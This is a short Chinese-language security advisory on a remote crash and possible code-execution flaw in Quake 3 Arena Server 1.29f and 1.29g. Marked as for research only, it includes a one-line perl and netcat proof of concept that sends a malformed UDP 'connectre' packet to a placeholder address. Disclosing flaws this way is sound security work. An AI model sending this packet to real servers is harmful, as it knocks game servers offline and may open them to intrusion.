发布日期：2001-07-30
更新日期：2001-08-04

受影响系统：

id Software Quake 3 Arena Server 1.29g
id Software Quake 3 Arena Server 1.29f

描述：

---

BUGTRAQ  ID: 3123
CVE(CAN) ID: CAN-2001-1289

Quake3 Arena是用于网络上的多个玩家交互式游戏的软件包。

发现其存在安全漏洞，恶意用户可能使Quake 3服务器远程崩溃，也可能执行任意代码。

<*来源：Coolest *>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

The Tree of Life （drttol@hotmail.com）提供了如下测试代码：

perl -wle 'printf("%c%c%c%c%s",255,255,255,255,"connectre")' | nc -u 1.1.1.1

建议：

---

厂商补丁：

目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商
的主页以获取最新版本：
http://www.quake3arena.com/


浏览次数：3630
严重程度：0（网友投票）